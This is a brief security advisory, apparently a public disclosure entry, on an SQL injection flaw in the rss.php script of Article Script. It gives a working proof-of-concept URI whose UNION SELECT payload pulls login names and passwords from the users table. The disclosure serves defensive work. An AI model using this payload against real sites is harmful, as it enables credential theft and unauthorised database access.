Article Script RSS.PHP SQL Injection Vulnerability

Article Script RSS.PHP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI demonstrates this vulnerability:

http://www.example.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*